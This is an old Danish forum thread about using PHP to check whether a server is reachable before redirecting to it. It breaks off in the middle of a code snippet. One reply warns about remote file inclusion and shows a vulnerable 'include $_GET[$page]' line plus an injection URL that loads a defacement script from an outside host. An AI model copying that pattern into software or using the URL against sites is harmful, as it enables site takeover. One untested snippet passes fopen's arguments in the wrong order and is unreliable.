Check om bestemt IP er tilgængelig inden r~
Fra : Michael Alø-Nielsen

Dato : 01-12-02 08:05

Kan dette lade sig gøre?
Og hvordan gør jeg i praksis?

Hvordan checker jeg om en bestemt IP-adresse er tilgængelig inden jeg
redirecter?
Hvis IP-adressen er tilgængelig skal jeg redirecte til et dokument på denne
IP.
Hvis ikke IP-adressen er tilgængelig, skal der ikke redirectes.

/Michael.

Fra : Henning Petersen

Dato : 01-12-02 20:43

On Sun, 1 Dec 2002 08:04:44 +0100, "Michael Alø-Nielsen"
<m-alo@nospam.dk> wrote:

> [...]
> IP.
> Hvis ikke IP-adressen er tilgængelig, skal der ikke redirectes.

En mulighed er at hvis du vil redirecte til
   www.domain.dk/en_speciel_side.html

så forsøger du at læse siden i php:

if ($fp = @fopen("r","http://www.domain.dk/en_speciel_side.html")) {
   fclose($fp);
   // redirect ok
   header("Location: http://www.domain.dk/en_speciel_side.html");
}

Jeg har ikke testet det, men det burde virke i princippet.

--
Venlig hilsen / Best regards
   Henning

_H_P_C_o_n_s_u_l_t_ http://www.hpc.dk
Skoletoften 9, Blans http://www.turnsys.dk
DK - 6400 Soenderborg

Fra : Henrik Stidsen

Dato : 01-12-02 22:39

Henning Petersen <henning.petersen.021130@hpc.dk> wrote in

> if ($fp =
> [...]

Virker bare ikke hvis PHP har disablet at fopen kan åbne URL's - det
gøres nogle steder som sikkerhedsfeature.

--
Henrik Stidsen | HS235-DK | Ikke eksisterende samleobjekt/undtagelse
"I am a nobody, and nobody is perfect; therefore I am perfect."

Fra : Henning Petersen

Dato : 02-12-02 15:45

On Sun, 1 Dec 2002 21:38:56 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> Henning Petersen <henning.petersen.021130@hpc.dk> wrote in

> Virker bare ikke hvis PHP har disablet at fopen kan åbne URL's - det
> gøres nogle steder som sikkerhedsfeature.

Ja det er slevfølgelig et problem som heldigvis endnu ikke er stødt in
i. Men derud over virker det vist alligevel

Fra : Henrik Stidsen

Dato : 03-12-02 00:35

Henning Petersen <henning.petersen.021202@hpc.dk> wrote in

> Ja det er slevfølgelig et problem som heldigvis endnu ikke er
> stødt in i. Men derud over virker det vist alligevel

Jeg har ikke undersøgt om det er opsat sådan på de webhoteller jeg
har adgang til. Med lidt omtanke er det heller ikke nødvendigt. Man
skal for alt i verden sørge for at checke på input der angiver en fil
der skal inluderes, hvis fopen og include kan hente filer fra andre
servere har man åbnet døren på noget nær vid gab hvis man ikke
checker inputtet ordentligt.

Fra : Henning Petersen

Dato : 03-12-02 20:52

On Mon, 2 Dec 2002 23:34:33 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> [...]
> der skal inluderes, hvis fopen og include kan hente filer fra andre
> servere har man åbnet døren på noget nær vid gab hvis man ikke

Principielt ja., men det eneste min stump kode gør er at åben en side.
Der laves jo _intet_ ved inputtet - det læses jo end ikke ind fra
"file", så det burde efter min bedste overbevisning ikke være et
problem.

Men hvis der er nogen som har argumenter på det modsatte er jeg meget
lydhør, da jeg selv har tænkt på at lave en lignende løsning i
forbindelse med en redir.

Fra : Henrik Stidsen

Dato : 03-12-02 23:58

Henning Petersen <henning.petersen.021203@hpc.dk> wrote in

> [...]
> side. Der laves jo _intet_ ved inputtet - det læses jo end ikke
> ind fra "file", så det burde efter min bedste overbevisning ikke

Det lyder jo godt nok - nævnte det også bare lige for en sikkerheds
skyld. Der var en der i en gruppe nævnte at hans side var blevet
defaced pga. sådan en fejl!

> Men hvis der er nogen som har argumenter på det modsatte er jeg
> meget lydhør, da jeg selv har tænkt på at lave en lignende
> løsning i forbindelse med en redir.

Så skal vi nok se på din kode :)

Fra : Henning Petersen

Dato : 05-12-02 16:54

On Tue, 3 Dec 2002 22:58:23 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> [...]
>
> Det lyder jo godt nok - nævnte det også bare lige for en sikkerheds
> skyld. Der var en der i en gruppe nævnte at hans side var blevet

Hvis man bruger indholdet, af siden er det selvfølgelig nødvendigt at
validere, men i koden jeg postede tidligere lavede jeg blot en fopen()
og efterfølgende fclose() for at se om der var hul.

Det kan jeg ikke se der skulle være problemer i.

Ikke andet end at siden der hentes pludselig bliver lavet _meget_
stor, men umiddelbart burde det vel ikke give andre problemer end at
der sluges en masse hukommelse, som efterfølgende frigives igen.
- eller tager jeg fejl?

> Så skal vi nok se på din kode :)

Er posted tidligere i tråden.

Fra : Henrik Stidsen

Dato : 05-12-02 23:59

Henning Petersen <henning.petersen.021205@hpc.dk> wrote in

> - eller tager jeg fejl?

Nej, problemet er hvis der laves en kode i stil med:

<?php
// Hent tekst til siden
include $_GET[$page];
?>

Her regner man med at ?page=indholdsfil. Hvis man så, i
adresselinien, sætter ?page=http://hackers.org/defacer.php kan du
måske gætte hvad der sker :)

Har engang mødt en der var på grænsen, det var muligt at indlæse
index i index - altså et uendeligt loop...

Fra : Henning Petersen

Dato : 16-12-02 13:44

Helt enig.

Fra : Michael Alø-Nielsen

Dato : 02-12-02 08:19

"Michael Alø-Nielsen" <m-alo@nospam.dk> skrev i en meddelelse

> Kan dette lade sig gøre?
> Og hvordan gør jeg i praksis?

Tak for jeres forslag, men jeg fandt en løsning der virkede for mig
andetsteds... Jeg gjorde det at jeg oprettede en tekstfil (check.txt) på
serveren jeg vil redirecte til, og der hvor der skal redirectes fra bruger
jeg så følgende kode:

<?
$check = @file("http://min-ip/check.txt");
if (is_array($check)){